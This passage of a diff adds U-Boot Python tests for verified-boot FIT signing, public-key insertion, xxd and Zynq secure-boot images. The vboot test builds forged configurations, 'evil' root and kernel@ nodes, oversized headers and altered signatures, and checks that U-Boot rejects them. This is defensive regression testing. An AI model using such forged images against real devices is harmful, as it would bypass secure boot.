+TESTDATA_IN = [ + ['sha1-basic', 'sha1', '', None, False, True, False, False], + ['sha1-pad', 'sha1', '', '-E -p 0x10000', False, False, False, False], + ['sha1-pss', 'sha1', '-pss', None, False, False, False, False], + ['sha1-pss-pad', 'sha1', '-pss', '-E -p 0x10000', False, False, False, False], + ['sha256-basic', 'sha256', '', None, False, False, False, False], + ['sha256-pad', 'sha256', '', '-E -p 0x10000', False, False, False, False], + ['sha256-pss', 'sha256', '-pss', None, False, False, False, False], + ['sha256-pss-pad', 'sha256', '-pss', '-E -p 0x10000', False, False, False, False], + ['sha256-pss-required', 'sha256', '-pss', None, True, False, False, False], + ['sha256-pss-pad-required', 'sha256', '-pss', '-E -p 0x10000', True, True, False, False], + ['sha384-basic', 'sha384', '', None, False, False, False, False], + ['sha384-pad', 'sha384', '', '-E -p 0x10000', False, False, False, False], + ['algo-arg', 'algo-arg', '', '-o sha256,rsa2048', False, False, True, False], + ['sha256-global-sign', 'sha256', '', '', False, False, False, True], + ['sha256-global-sign-pss', 'sha256', '-pss', '', False, False, False, True], +] + +# Mark all but the first test as slow, so they are not run with '-k not slow' +TESTDATA = [TESTDATA_IN[0]] +TESTDATA += [pytest.param(*v, marks=pytest.mark.slow) for v in TESTDATA_IN[1:]] + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('fit_signature') +@pytest.mark.requiredtool('dtc') +@pytest.mark.requiredtool('fdtget') +@pytest.mark.requiredtool('fdtput') +@pytest.mark.requiredtool('openssl') +@pytest.mark.parametrize("name,sha_algo,padding,sign_options,required,full_test,algo_arg,global_sign", + TESTDATA) +def test_vboot(u_boot_console, name, sha_algo, padding, sign_options, required, + full_test, algo_arg, global_sign): + """Test verified boot signing with mkimage and verification with 'bootm'. + + This works using sandbox only as it needs to update the device tree used + by U-Boot to hold public keys from the signing process. + + The SHA1 and SHA256 tests are combined into a single test since the + key-generation process is quite slow and we want to avoid doing it twice. + """ + def dtc_options(dts, options): + """Run the device tree compiler to compile a .dts file + + The output file will be the same as the input file but with a .dtb + extension. + + Args: + dts: Device tree file to compile. + options: Options provided to the compiler. + """ + dtb = dts.replace('.dts', '.dtb') + util.run_and_log(cons, 'dtc %s %s%s -O dtb ' + '-o %s%s %s' % (dtc_args, datadir, dts, tmpdir, dtb, options)) + + def run_binman(dtb): + """Run binman to build an image + + Args: + dtb: Device tree file used as input file. + """ + pythonpath = os.environ.get('PYTHONPATH', '') + os.environ['PYTHONPATH'] = pythonpath + ':' + '%s/../scripts/dtc/pylibfdt' % tmpdir + util.run_and_log(cons, [binman, 'build', '-d', "%s/%s" % (tmpdir,dtb), + '-a', "pre-load-key-path=%s" % tmpdir, '-O', + tmpdir, '-I', tmpdir]) + os.environ['PYTHONPATH'] = pythonpath + + def run_bootm(sha_algo, test_type, expect_string, boots, fit=None): + """Run a 'bootm' command U-Boot. + + This always starts a fresh U-Boot instance since the device tree may + contain a new public key. + + Args: + test_type: A string identifying the test type. + expect_string: A string which is expected in the output. + sha_algo: Either 'sha1' or 'sha256', to select the algorithm to + use. 
+ boots: A boolean that is True if Linux should boot and False if + we are expected to not boot + fit: FIT filename to load and verify + """ + if not fit: + fit = '%stest.fit' % tmpdir + cons.restart_uboot() + with cons.log.section('Verified boot %s %s' % (sha_algo, test_type)): + output = cons.run_command_list( + ['host load hostfs - 100 %s' % fit, + 'fdt addr 100', + 'bootm 100']) + assert expect_string in ''.join(output) + if boots: + assert 'sandbox: continuing, as we cannot run' in ''.join(output) + else: + assert('sandbox: continuing, as we cannot run' + not in ''.join(output)) + + def sign_fit(sha_algo, options): + """Sign the FIT + + Signs the FIT and writes the signature into it. It also writes the + public key into the dtb. + + Args: + sha_algo: Either 'sha1' or 'sha256', to select the algorithm to + use. + options: Options to provide to mkimage. + """ + args = [mkimage, '-F', '-k', tmpdir, '-K', dtb, '-r', fit] + if options: + args += options.split(' ') + cons.log.action('%s: Sign images' % sha_algo) + util.run_and_log(cons, args) + + def sign_fit_dtb(sha_algo, options, dtb): + """Sign the FIT + + Signs the FIT and writes the signature into it. It also writes the + public key into the dtb. + + Args: + sha_algo: Either 'sha1' or 'sha256', to select the algorithm to + use. + options: Options to provide to mkimage. + """ + args = [mkimage, '-F', '-k', tmpdir, '-K', dtb, '-r', fit] + if options: + args += options.split(' ') + cons.log.action('%s: Sign images' % sha_algo) + util.run_and_log(cons, args) + + def sign_fit_norequire(sha_algo, options): + """Sign the FIT + + Signs the FIT and writes the signature into it. It also writes the + public key into the dtb. It does not mark key as 'required' in dtb. + + Args: + sha_algo: Either 'sha1' or 'sha256', to select the algorithm to + use. + options: Options to provide to mkimage. + """ + args = [mkimage, '-F', '-k', tmpdir, '-K', dtb, fit] + if options: + args += options.split(' ') + cons.log.action('%s: Sign images' % sha_algo) + util.run_and_log(cons, args) + + def replace_fit_totalsize(size): + """Replace FIT header's totalsize with something greater. + + The totalsize must be less than or equal to FIT_SIGNATURE_MAX_SIZE. + If the size is greater, the signature verification should return false. + + Args: + size: The new totalsize of the header + + Returns: + prev_size: The previous totalsize read from the header + """ + total_size = 0 + with open(fit, 'r+b') as handle: + handle.seek(4) + total_size = handle.read(4) + handle.seek(4) + handle.write(struct.pack(">I", size)) + return struct.unpack(">I", total_size)[0] + + def corrupt_file(fit, offset, value): + """Corrupt a file + + To corrupt a file, a value is written at the specified offset + + Args: + fit: The file to corrupt + offset: Offset to write + value: Value written + """ + with open(fit, 'r+b') as handle: + handle.seek(offset) + handle.write(struct.pack(">I", value)) + + def create_rsa_pair(name): + """Generate a new RSA key paid and certificate + + Args: + name: Name of of the key (e.g. 
'dev') + """ + public_exponent = 65537 + + if sha_algo == "sha384": + rsa_keygen_bits = 3072 + else: + rsa_keygen_bits = 2048 + + util.run_and_log(cons, 'openssl genpkey -algorithm RSA -out %s%s.key ' + '-pkeyopt rsa_keygen_bits:%d ' + '-pkeyopt rsa_keygen_pubexp:%d' % + (tmpdir, name, rsa_keygen_bits, public_exponent)) + + # Create a certificate containing the public key + util.run_and_log(cons, 'openssl req -batch -new -x509 -key %s%s.key ' + '-out %s%s.crt' % (tmpdir, name, tmpdir, name)) + + def test_with_algo(sha_algo, padding, sign_options): + """Test verified boot with the given hash algorithm. + + This is the main part of the test code. The same procedure is followed + for both hashing algorithms. + + Args: + sha_algo: Either 'sha1' or 'sha256', to select the algorithm to + use. + padding: Either '' or '-pss', to select the padding to use for the + rsa signature algorithm. + sign_options: Options to mkimage when signing a fit image. + """ + # Compile our device tree files for kernel and U-Boot. These are + # regenerated here since mkimage will modify them (by adding a + # public key) below. + dtc('sandbox-kernel.dts', cons, dtc_args, datadir, tmpdir, dtb) + dtc('sandbox-u-boot.dts', cons, dtc_args, datadir, tmpdir, dtb) + + # Build the FIT, but don't sign anything yet + cons.log.action('%s: Test FIT with signed images' % sha_algo) + make_fit('sign-images-%s%s.its' % (sha_algo, padding), cons, mkimage, dtc_args, datadir, fit) + run_bootm(sha_algo, 'unsigned images', ' - OK' if algo_arg else 'dev-', True) + + # Sign images with our dev keys + sign_fit(sha_algo, sign_options) + run_bootm(sha_algo, 'signed images', 'dev+', True) + + # Create a fresh .dtb without the public keys + dtc('sandbox-u-boot.dts', cons, dtc_args, datadir, tmpdir, dtb) + + cons.log.action('%s: Test FIT with signed configuration' % sha_algo) + make_fit('sign-configs-%s%s.its' % (sha_algo, padding), cons, mkimage, dtc_args, datadir, fit) + run_bootm(sha_algo, 'unsigned config', '%s+ OK' % ('sha256' if algo_arg else sha_algo), True) + + # Sign images with our dev keys + sign_fit(sha_algo, sign_options) + run_bootm(sha_algo, 'signed config', 'dev+', True) + + cons.log.action('%s: Check signed config on the host' % sha_algo) + + util.run_and_log(cons, [fit_check_sign, '-f', fit, '-k', dtb]) + + if full_test: + # Make sure that U-Boot checks that the config is in the list of + # hashed nodes. If it isn't, a security bypass is possible. + ffit = '%stest.forged.fit' % tmpdir + shutil.copyfile(fit, ffit) + with open(ffit, 'rb') as fd: + root, strblock = vboot_forge.read_fdt(fd) + root, strblock = vboot_forge.manipulate(root, strblock) + with open(ffit, 'w+b') as fd: + vboot_forge.write_fdt(root, strblock, fd) + util.run_and_log_expect_exception( + cons, [fit_check_sign, '-f', ffit, '-k', dtb], + 1, 'Failed to verify required signature') + + run_bootm(sha_algo, 'forged config', 'Bad Data Hash', False, ffit) + + # Try adding an evil root node. This should be detected. + efit = '%stest.evilf.fit' % tmpdir + shutil.copyfile(fit, efit) + vboot_evil.add_evil_node(fit, efit, evil_kernel, 'fakeroot') + + util.run_and_log_expect_exception( + cons, [fit_check_sign, '-f', efit, '-k', dtb], + 1, 'Failed to verify required signature') + run_bootm(sha_algo, 'evil fakeroot', 'Bad FIT kernel image format', + False, efit) + + # Try adding an @ to the kernel node name. This should be detected. 
+ efit = '%stest.evilk.fit' % tmpdir + shutil.copyfile(fit, efit) + vboot_evil.add_evil_node(fit, efit, evil_kernel, 'kernel@') + + msg = 'Signature checking prevents use of unit addresses (@) in nodes' + util.run_and_log_expect_exception( + cons, [fit_check_sign, '-f', efit, '-k', dtb], + 1, msg) + run_bootm(sha_algo, 'evil kernel@', msg, False, efit) + + # Create a new properly signed fit and replace header bytes + make_fit('sign-configs-%s%s.its' % (sha_algo, padding), cons, mkimage, dtc_args, datadir, fit) + sign_fit(sha_algo, sign_options) + bcfg = u_boot_console.config.buildconfig + max_size = int(bcfg.get('config_fit_signature_max_size', 0x10000000), 0) + existing_size = replace_fit_totalsize(max_size + 1) + run_bootm(sha_algo, 'Signed config with bad hash', 'Bad Data Hash', + False) + cons.log.action('%s: Check overflowed FIT header totalsize' % sha_algo) + + # Replace with existing header bytes + replace_fit_totalsize(existing_size) + run_bootm(sha_algo, 'signed config', 'dev+', True) + cons.log.action('%s: Check default FIT header totalsize' % sha_algo) + + # Increment the first byte of the signature, which should cause failure + sig = util.run_and_log(cons, 'fdtget -t bx %s %s value' % + (fit, sig_node)) + byte_list = sig.split() + byte = int(byte_list[0], 16) + byte_list[0] = '%x' % (byte + 1) + sig = ' '.join(byte_list) + util.run_and_log(cons, 'fdtput -t bx %s %s value %s' % + (fit, sig_node, sig)) + + run_bootm(sha_algo, 'Signed config with bad hash', 'Bad Data Hash', + False) + + cons.log.action('%s: Check bad config on the host' % sha_algo) + util.run_and_log_expect_exception( + cons, [fit_check_sign, '-f', fit, '-k', dtb], + 1, 'Failed to verify required signature') + + def test_required_key(sha_algo, padding, sign_options): + """Test verified boot with the given hash algorithm. + + This function tests if U-Boot rejects an image when a required key isn't + used to sign a FIT. + + Args: + sha_algo: Either 'sha1' or 'sha256', to select the algorithm to use + padding: Either '' or '-pss', to select the padding to use for the + rsa signature algorithm. + sign_options: Options to mkimage when signing a fit image. + """ + # Compile our device tree files for kernel and U-Boot. These are + # regenerated here since mkimage will modify them (by adding a + # public key) below. + dtc('sandbox-kernel.dts', cons, dtc_args, datadir, tmpdir, dtb) + dtc('sandbox-u-boot.dts', cons, dtc_args, datadir, tmpdir, dtb) + + cons.log.action('%s: Test FIT with configs images' % sha_algo) + + # Build the FIT with prod key (keys required) and sign it. This puts the + # signature into sandbox-u-boot.dtb, marked 'required' + make_fit('sign-configs-%s%s-prod.its' % (sha_algo, padding), cons, mkimage, dtc_args, datadir, fit) + sign_fit(sha_algo, sign_options) + + # Build the FIT with dev key (keys NOT required). This adds the + # signature into sandbox-u-boot.dtb, NOT marked 'required'. + make_fit('sign-configs-%s%s.its' % (sha_algo, padding), cons, mkimage, dtc_args, datadir, fit) + sign_fit_norequire(sha_algo, sign_options) + + # So now sandbox-u-boot.dtb two signatures, for the prod and dev keys. + # Only the prod key is set as 'required'. But FIT we just built has + # a dev signature only (sign_fit_norequire() overwrites the FIT). + # Try to boot the FIT with dev key. This FIT should not be accepted by + # U-Boot because the prod key is required. + run_bootm(sha_algo, 'required key', '', False) + + # Build the FIT with dev key (keys required) and sign it. 
This puts the + # signature into sandbox-u-boot.dtb, marked 'required'. + make_fit('sign-configs-%s%s.its' % (sha_algo, padding), cons, mkimage, dtc_args, datadir, fit) + sign_fit(sha_algo, sign_options) + + # Set the required-mode policy to "any". + # So now sandbox-u-boot.dtb two signatures, for the prod and dev keys. + # Both the dev and prod key are set as 'required'. But FIT we just built has + # a dev signature only (sign_fit() overwrites the FIT). + # Try to boot the FIT with dev key. This FIT should be accepted by + # U-Boot because the dev key is required and policy is "any" required key. + util.run_and_log(cons, 'fdtput -t s %s /signature required-mode any' % + (dtb)) + run_bootm(sha_algo, 'multi required key', 'dev+', True) + + # Set the required-mode policy to "all". + # So now sandbox-u-boot.dtb two signatures, for the prod and dev keys. + # Both the dev and prod key are set as 'required'. But FIT we just built has + # a dev signature only (sign_fit() overwrites the FIT). + # Try to boot the FIT with dev key. This FIT should not be accepted by + # U-Boot because the prod key is required and policy is "all" required key + util.run_and_log(cons, 'fdtput -t s %s /signature required-mode all' % + (dtb)) + run_bootm(sha_algo, 'multi required key', '', False) + + def test_global_sign(sha_algo, padding, sign_options): + """Test global image signature with the given hash algorithm and padding. + + Args: + sha_algo: Either 'sha1' or 'sha256', to select the algorithm to use + padding: Either '' or '-pss', to select the padding to use for the + rsa signature algorithm. + """ + + dtb = '%ssandbox-u-boot-global%s.dtb' % (tmpdir, padding) + cons.config.dtb = dtb + + # Compile our device tree files for kernel and U-Boot. These are + # regenerated here since mkimage will modify them (by adding a + # public key) below. + dtc('sandbox-kernel.dts', cons, dtc_args, datadir, tmpdir, dtb) + dtc_options('sandbox-u-boot-global%s.dts' % padding, '-p 1024') + + # Build the FIT with dev key (keys NOT required). This adds the + # signature into sandbox-u-boot.dtb, NOT marked 'required'. + make_fit('simple-images.its', cons, mkimage, dtc_args, datadir, fit) + sign_fit_dtb(sha_algo, '', dtb) + + # Build the dtb for binman that define the pre-load header + # with the global sigature. + dtc('sandbox-binman%s.dts' % padding, cons, dtc_args, datadir, tmpdir, dtb) + + # Run binman to create the final image with the not signed fit + # and the pre-load header that contains the global signature. 
+ run_binman('sandbox-binman%s.dtb' % padding) + + # Check that the signature is correctly verified by u-boot + run_bootm(sha_algo, 'global image signature', + 'signature check has succeed', True, "%ssandbox.img" % tmpdir) + + # Corrupt the image (just one byte after the pre-load header) + corrupt_file("%ssandbox.img" % tmpdir, 4096, 255); + + # Check that the signature verification fails + run_bootm(sha_algo, 'global image signature', + 'signature check has failed', False, "%ssandbox.img" % tmpdir) + + # Check that the boot fails if the global signature is not provided + run_bootm(sha_algo, 'global image signature', 'signature is mandatory', False) + + cons = u_boot_console + tmpdir = os.path.join(cons.config.result_dir, name) + '/' + if not os.path.exists(tmpdir): + os.mkdir(tmpdir) + datadir = cons.config.source_dir + '/test/py/tests/vboot/' + fit = '%stest.fit' % tmpdir + mkimage = cons.config.build_dir + '/tools/mkimage' + binman = cons.config.source_dir + '/tools/binman/binman' + fit_check_sign = cons.config.build_dir + '/tools/fit_check_sign' + dtc_args = '-I dts -O dtb -i %s' % tmpdir + dtb = '%ssandbox-u-boot.dtb' % tmpdir + sig_node = '/configurations/conf-1/signature' + + create_rsa_pair('dev') + create_rsa_pair('prod') + + # Create a number kernel image with zeroes + with open('%stest-kernel.bin' % tmpdir, 'wb') as fd: + fd.write(500 * b'\0') + + # Create a second kernel image with ones + evil_kernel = '%stest-kernel1.bin' % tmpdir + with open(evil_kernel, 'wb') as fd: + fd.write(500 * b'\x01') + + # We need to use our own device tree file. Remember to restore it + # afterwards. + old_dtb = cons.config.dtb + try: + cons.config.dtb = dtb + if global_sign: + test_global_sign(sha_algo, padding, sign_options) + elif required: + test_required_key(sha_algo, padding, sign_options) + else: + test_with_algo(sha_algo, padding, sign_options) + finally: + # Go back to the original U-Boot with the correct dtb. + cons.config.dtb = old_dtb + cons.restart_uboot() + + +TESTDATA_IN = [ + ['sha1-basic', 'sha1', '', None, False], + ['sha1-pad', 'sha1', '', '-E -p 0x10000', False], + ['sha1-pss', 'sha1', '-pss', None, False], + ['sha1-pss-pad', 'sha1', '-pss', '-E -p 0x10000', False], + ['sha256-basic', 'sha256', '', None, False], + ['sha256-pad', 'sha256', '', '-E -p 0x10000', False], + ['sha256-pss', 'sha256', '-pss', None, False], + ['sha256-pss-pad', 'sha256', '-pss', '-E -p 0x10000', False], + ['sha256-pss-required', 'sha256', '-pss', None, False], + ['sha256-pss-pad-required', 'sha256', '-pss', '-E -p 0x10000', False], + ['sha384-basic', 'sha384', '', None, False], + ['sha384-pad', 'sha384', '', '-E -p 0x10000', False], + ['algo-arg', 'algo-arg', '', '-o sha256,rsa2048', True], + ['sha256-global-sign', 'sha256', '', '', False], + ['sha256-global-sign-pss', 'sha256', '-pss', '', False], +] + +# Mark all but the first test as slow, so they are not run with '-k not slow' +TESTDATA = [TESTDATA_IN[0]] +TESTDATA += [pytest.param(*v, marks=pytest.mark.slow) for v in TESTDATA_IN[1:]] + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('fit_signature') +@pytest.mark.requiredtool('dtc') +@pytest.mark.requiredtool('openssl') +@pytest.mark.parametrize("name,sha_algo,padding,sign_options,algo_arg", TESTDATA) +def test_fdt_add_pubkey(u_boot_console, name, sha_algo, padding, sign_options, algo_arg): + """Test fdt_add_pubkey utility with bunch of different algo options.""" + + def sign_fit(sha_algo, options): + """Sign the FIT + + Signs the FIT and writes the signature into it. 
+ + Args: + sha_algo: Either 'sha1' or 'sha256', to select the algorithm to + use. + options: Options to provide to mkimage. + """ + args = [mkimage, '-F', '-k', tmpdir, fit] + if options: + args += options.split(' ') + cons.log.action('%s: Sign images' % sha_algo) + util.run_and_log(cons, args) + + def test_add_pubkey(sha_algo, padding, sign_options): + """Test fdt_add_pubkey utility with given hash algorithm and padding. + + This function tests if fdt_add_pubkey utility may add public keys into dtb. + + Args: + sha_algo: Either 'sha1' or 'sha256', to select the algorithm to use + padding: Either '' or '-pss', to select the padding to use for the + rsa signature algorithm. + sign_options: Options to mkimage when signing a fit image. + """ + + # Create a fresh .dtb without the public keys + dtc('sandbox-u-boot.dts', cons, dtc_args, datadir, tmpdir, dtb) + + cons.log.action('%s: Test fdt_add_pubkey with signed configuration' % sha_algo) + # Then add the dev key via the fdt_add_pubkey tool + util.run_and_log(cons, [fdt_add_pubkey, '-a', '%s,%s' % ('sha256' if algo_arg else sha_algo, \ + 'rsa3072' if sha_algo == 'sha384' else 'rsa2048'), + '-k', tmpdir, '-n', 'dev', '-r', 'conf', dtb]) + + make_fit('sign-configs-%s%s.its' % (sha_algo, padding), cons, mkimage, dtc_args, datadir, fit) + + # Sign images with our dev keys + sign_fit(sha_algo, sign_options) + + # Check with fit_check_sign that FIT is signed with key + util.run_and_log(cons, [fit_check_sign, '-f', fit, '-k', dtb]) + + cons = u_boot_console + tmpdir = os.path.join(cons.config.result_dir, name) + '/' + if not os.path.exists(tmpdir): + os.mkdir(tmpdir) + datadir = cons.config.source_dir + '/test/py/tests/vboot/' + fit = '%stest.fit' % tmpdir + mkimage = cons.config.build_dir + '/tools/mkimage' + binman = cons.config.source_dir + '/tools/binman/binman' + fit_check_sign = cons.config.build_dir + '/tools/fit_check_sign' + fdt_add_pubkey = cons.config.build_dir + '/tools/fdt_add_pubkey' + dtc_args = '-I dts -O dtb -i %s' % tmpdir + dtb = '%ssandbox-u-boot.dtb' % tmpdir + + # keys created in test_vboot test + + test_add_pubkey(sha_algo, padding, sign_options) diff --git a/test/py/tests/test_vpl.py b/test/py/tests/test_vpl.py new file mode 100644 index 00000000000..4af578b9173 --- /dev/null +++ b/test/py/tests/test_vpl.py @@ -0,0 +1,34 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright 2022 Google LLC +# Written by Simon Glass <sjg@chromium.org> + +import os.path +import pytest + +def test_vpl(u_boot_console, ut_vpl_subtest): + """Execute a "ut" subtest. + + The subtests are collected in function generate_ut_subtest() from linker + generated lists by applying a regular expression to the lines of file + vpl/u-boot-vpl.sym. The list entries are created using the C macro + UNIT_TEST(). + + Strict naming conventions have to be followed to match the regular + expression. Use UNIT_TEST(foo_test_bar, _flags, foo_test) for a test bar in + test suite foo that can be executed via command 'ut foo bar' and is + implemented in C function foo_test_bar(). + + Args: + u_boot_console (ConsoleBase): U-Boot console + ut_subtest (str): VPL test to be executed (e.g. 'dm platdata_phandle') + """ + try: + cons = u_boot_console + cons.restart_uboot_with_flags(['-u', '-k', ut_vpl_subtest.split()[1]]) + output = cons.get_spawn_output().replace('\r', '') + assert 'Failures: 0' in output + finally: + # Restart afterward in case a non-VPL test is run next. 
This should not + # happen since VPL tests are run in their own invocation of test.py, but + # the cost of doing this is not too great at present. + u_boot_console.restart_uboot() diff --git a/test/py/tests/test_xxd/conftest.py b/test/py/tests/test_xxd/conftest.py new file mode 100644 index 00000000000..47c7cce1aa9 --- /dev/null +++ b/test/py/tests/test_xxd/conftest.py @@ -0,0 +1,36 @@ +# SPDX-License-Identifier: GPL-2.0+ + +"""Fixture for xxd command test +""" + +import os +import shutil +from subprocess import check_call, CalledProcessError +import pytest + +@pytest.fixture(scope='session') +def xxd_data(u_boot_config): + """Set up a file system to be used in xxd tests + + Args: + u_boot_config -- U-Boot configuration. + """ + mnt_point = u_boot_config.persistent_data_dir + '/test_xxd' + image_path = u_boot_config.persistent_data_dir + '/xxd.img' + + try: + os.mkdir(mnt_point, mode = 0o755) + + with open(mnt_point + '/hello', 'w', encoding = 'ascii') as file: + file.write('hello world\n\x00\x01\x02\x03\x04\x05') + + check_call(f'virt-make-fs --partition=gpt --size=+1M --type=vfat {mnt_point} {image_path}', + shell=True) + + yield image_path + except CalledProcessError: + pytest.skip('Setup failed') + finally: + shutil.rmtree(mnt_point) + if os.path.exists(image_path): + os.remove(image_path) diff --git a/test/py/tests/test_xxd/test_xxd.py b/test/py/tests/test_xxd/test_xxd.py new file mode 100644 index 00000000000..06b9cfc0003 --- /dev/null +++ b/test/py/tests/test_xxd/test_xxd.py @@ -0,0 +1,23 @@ +# SPDX-License-Identifier: GPL-2.0+ + +""" Unit test for xxd command +""" + +import pytest + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_xxd') +def test_xxd(u_boot_console, xxd_data): + """ Unit test for xxd + + Args: + u_boot_console -- U-Boot console + xxd_data -- Path to the disk image used for testing. + """ + response = u_boot_console.run_command_list([ + f'host bind 0 {xxd_data}', + 'xxd host 0 hello']) + + assert '00000000: 68 65 6c 6c 6f 20 77 6f 72 6c 64 0a 00 01 02 03 hello world.....\r\r\n' + \ + '00000010: 04 05 ..' \ + in response diff --git a/test/py/tests/test_zynq_secure.py b/test/py/tests/test_zynq_secure.py new file mode 100644 index 00000000000..0ee5aebc484 --- /dev/null +++ b/test/py/tests/test_zynq_secure.py @@ -0,0 +1,190 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2023, Advanced Micro Devices, Inc. + +import pytest +import re +import u_boot_utils +import test_net + +""" +This test verifies different type of secure boot images to authentication and +decryption using AES and RSA features for AMD's Zynq SoC. + +Note: This test relies on boardenv_* containing configuration values to define +the network available and files to be used for testing. Without this, this test +will be automatically skipped. It also relies on dhcp or setup_static net test +to support tftp to load files from a TFTP server. + +For example: + +# Details regarding the files that may be read from a TFTP server and addresses +# and size for aes and rsa cases respectively. This variable may be omitted or +# set to None if zynqmp secure testing is not possible or desired. 
+env__zynq_aes_readable_file = { + 'fn': 'zynq_aes_image.bin', + 'fnbit': 'zynq_aes_bit.bin', + 'fnpbit': 'zynq_aes_par_bit.bin', + 'srcaddr': 0x1000000, + 'dstaddr': 0x2000000, + 'dstlen': 0x1000000, +} + +env__zynq_rsa_readable_file = { + 'fn': 'zynq_rsa_image.bin', + 'fninvalid': 'zynq_rsa_image_invalid.bin', + 'srcaddr': 0x1000000, +} +""" + +def zynq_secure_pre_commands(u_boot_console): + output = u_boot_console.run_command('print modeboot') + if not 'modeboot=' in output: + pytest.skip('bootmode cannnot be determined') + m = re.search('modeboot=(.+?)boot', output) + if not m: + pytest.skip('bootmode cannnot be determined') + bootmode = m.group(1) + if bootmode == 'jtag': + pytest.skip('skipping due to jtag bootmode') + +@pytest.mark.buildconfigspec('cmd_zynq_aes') +def test_zynq_aes_image(u_boot_console): + f = u_boot_console.config.env.get('env__zynq_aes_readable_file', None) + if not f: + pytest.skip('No TFTP readable file for zynq secure aes case to read') + + dstaddr = f.get('dstaddr', None) + if not dstaddr: + pytest.skip('No dstaddr specified in env file to read') + + dstsize = f.get('dstlen', None) + if not dstsize: + pytest.skip('No dstlen specified in env file to read') + + zynq_secure_pre_commands(u_boot_console) + test_net.test_net_dhcp(u_boot_console) + if not test_net.net_set_up: + test_net.test_net_setup_static(u_boot_console) + + srcaddr = f.get('srcaddr', None) + if not srcaddr: + addr = u_boot_utils.find_ram_base(u_boot_console) + + expected_tftp = 'Bytes transferred = ' + fn = f['fn'] + output = u_boot_console.run_command('tftpboot %x %s' % (srcaddr, fn)) + assert expected_tftp in output + + expected_op = 'zynq aes [operation type] <srcaddr>' + output = u_boot_console.run_command( + 'zynq aes %x $filesize %x %x' % (srcaddr, dstaddr, dstsize) + ) + assert expected_op not in output + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_zynq_aes') +def test_zynq_aes_bitstream(u_boot_console): + f = u_boot_console.config.env.get('env__zynq_aes_readable_file', None) + if not f: + pytest.skip('No TFTP readable file for zynq secure aes case to read') + + zynq_secure_pre_commands(u_boot_console) + test_net.test_net_dhcp(u_boot_console) + if not test_net.net_set_up: + test_net.test_net_setup_static(u_boot_console) + + srcaddr = f.get('srcaddr', None) + if not srcaddr: + addr = u_boot_utils.find_ram_base(u_boot_console) + + expected_tftp = 'Bytes transferred = ' + fn = f['fnbit'] + output = u_boot_console.run_command('tftpboot %x %s' % (srcaddr, fn)) + assert expected_tftp in output + + expected_op = 'zynq aes [operation type] <srcaddr>' + output = u_boot_console.run_command( + 'zynq aes load %x $filesize' % (srcaddr) + ) + assert expected_op not in output + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_zynq_aes') +def test_zynq_aes_partial_bitstream(u_boot_console): + f = u_boot_console.config.env.get('env__zynq_aes_readable_file', None) + if not f: + pytest.skip('No TFTP readable file for zynq secure aes case to read') + + zynq_secure_pre_commands(u_boot_console) + test_net.test_net_dhcp(u_boot_console) + if not test_net.net_set_up: + test_net.test_net_setup_static(u_boot_console) + + srcaddr = f.get('srcaddr', None) + if not srcaddr: + addr = u_boot_utils.find_ram_base(u_boot_console) + + expected_tftp = 'Bytes transferred = ' + fn = f['fnpbit'] + output = u_boot_console.run_command('tftpboot %x %s' % (srcaddr, fn)) + assert expected_tftp in 
output + + expected_op = 'zynq aes [operation type] <srcaddr>' + output = u_boot_console.run_command('zynq aes loadp %x $filesize' % (srcaddr)) + assert expected_op not in output + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_zynq_rsa') +def test_zynq_rsa_image(u_boot_console): + f = u_boot_console.config.env.get('env__zynq_rsa_readable_file', None) + if not f: + pytest.skip('No TFTP readable file for zynq secure rsa case to read') + + zynq_secure_pre_commands(u_boot_console) + test_net.test_net_dhcp(u_boot_console) + if not test_net.net_set_up: + test_net.test_net_setup_static(u_boot_console) + + srcaddr = f.get('srcaddr', None) + if not srcaddr: + addr = u_boot_utils.find_ram_base(u_boot_console) + + expected_tftp = 'Bytes transferred = ' + fn = f['fn'] + output = u_boot_console.run_command('tftpboot %x %s' % (srcaddr, fn)) + assert expected_tftp in output + + expected_op = 'zynq rsa <baseaddr>' + output = u_boot_console.run_command('zynq rsa %x ' % (srcaddr)) + assert expected_op not in output + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_zynq_rsa') +def test_zynq_rsa_image_invalid(u_boot_console): + f = u_boot_console.config.env.get('env__zynq_rsa_readable_file', None) + if not f: + pytest.skip('No TFTP readable file for zynq secure rsa case to read') + + zynq_secure_pre_commands(u_boot_console) + test_net.test_net_dhcp(u_boot_console) + if not test_net.net_set_up: + test_net.test_net_setup_static(u_boot_console) + + srcaddr = f.get('srcaddr', None) + if not srcaddr: + addr = u_boot_utils.find_ram_base(u_boot_console) + + expected_tftp = 'Bytes transferred = ' + fninvalid = f['fninvalid'] + output = u_boot_console.run_command('tftpboot %x %s' % (srcaddr, fninvalid)) + assert expected_tftp in output + + expected_op = 'zynq rsa <baseaddr>' + output = u_boot_console.run_command('zynq rsa %x ' % (srcaddr)) + assert expected_op in output + output = u_boot_console.run_command('echo $?') + assert not output.endswith('0') diff --git a/test/py/tests/test_zynqmp_rpu.py b/test/py/tests/test_zynqmp_rpu.py new file mode 100644 index 00000000000..479a612b4ec --- /dev/null +++ b/test/py/tests/test_zynqmp_rpu.py @@ -0,0 +1,208 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2023, Advanced Micro Devices, Inc. + +import pytest +import random +import string +import test_net + +""" +Note: This test relies on boardenv_* containing configuration values to define +RPU applications information for AMD's ZynqMP SoC which contains, application +names, processors, address where it is built, expected output and the tftp load +addresses. This test will be automatically skipped without this. + +It also relies on dhcp or setup_static net test to support tftp to load +application on DDR. All the environment parameters are stored sequentially. +The length of all parameters values should be same. For example, if 2 app_names +are defined in a list as a value of parameter 'app_name' then the other +parameters value also should have a list with 2 items. +It will run RPU cases for all the applications defined in boardenv_* +configuration file. 
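Because get_rpu_apps_env() below indexes all of these lists in parallel, a
small sanity check of the kind sketched here (hypothetical, not part of the
test itself) can catch a malformed boardenv early:

    rpu_apps = u_boot_console.config.env['env__zynqmp_rpu_apps']
    lengths = {key: len(val) for key, val in rpu_apps.items()}
    assert len(set(lengths.values())) == 1, f'mismatched lengths: {lengths}'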
